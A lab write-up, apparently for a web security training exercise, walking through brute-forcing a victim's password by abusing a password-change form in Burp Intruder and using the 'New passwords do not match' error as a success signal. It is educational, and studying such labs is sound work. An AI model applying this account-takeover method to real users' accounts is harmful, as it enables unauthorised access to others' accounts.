Password brute-force via password change” is a technique in which an attacker uses a brute-force attack to log in to a user’s account by changing their password. Basically, the attacker has a list of many variations of passwords and tries each one until they can successfully log in to the user’s account.
This vulnerability exists in the password change feature, which the attacker exploits to carry out their attack.
The steps to solve the lab are as follows:
The lab clearly mentions that the “change password” functionality is vulnerable to a brute-force attack by an attacker. To solve the lab, we have been provided with credentials that we will use. Our credentials are “wiener:peter”, and the victim’s username is “carlos”. We have also been given a possible password list to use for the brute-force attack.
The first step is to log in to our account with our credentials so that we can analyze the features of the application.
I have used my credentials to log in to the Wiener’s account, which is my account. After logging in, I was redirected to a page that allows me to change my password. I have kept my Burp Suite’s proxy on so that the requests’ history can be stored there for our analysis later.
ab main apne account ka password change kar raha hu. current password mere pas peter tha jisa change kar k ma na peter1 kar dia or request ko ma na capture kar lia burp main. abi hum just analysis kar rahe he. password hamara successfully change ho gya hain.
Now, we will perform further testing on this password change feature. First, we will try to change our password again. We will try to enter the wrong current password, like “peter11,” or we will enter the same password in both the “new password” and “confirm password” boxes, like “peter100,” “peter100.” Then, we will check the response of the application to see how it is responding to these attempts.
What I observed was that the application has logged us out. Now, we will log in again and enter the correct current password, which is “peter1,” and we will enter different passwords in both “new password” fields.
So, I entered “peter1” as the current password and “peter12” and “peter23” in the “new password” fields. After performing these steps, the application gave me an error message.
The error message displayed by the application says “New passwords do not match.”
Now, I entered incorrect details in all three boxes.
I entered wrong details in all three boxes. For example, I entered “peter11” in the current password field, and “peter22” and “peter33” in the new password fields. As a result, an error was generated by the server, which said “Current password is incorrect.”
Bruteforce time.
I extracted a request that contained my current password and two different new passwords. Then, I sent it to Burp Intruder for further analysis.
Firstly, I changed the username from “wiener” to “carlos”. Then, I added the current password for bruteforce. After that, I pasted the list of passwords given to us in the lab into the payload section and went to the options tab.
Please go to the “Option” tab and add “New passwords do not match” in the “Grep-Match” field. Then start the attack.
After the attack ended, we clicked on the “new password do not match” option and the password was revealed to us. We logged in and solved the lab. Follow me on Twitter @masaudsec.
To continue studying check out the next lab i.e. Broken Brute-Force Protection, Multiple Credentials Per Request, cover the current lab before visiting the next lab. Good Luck!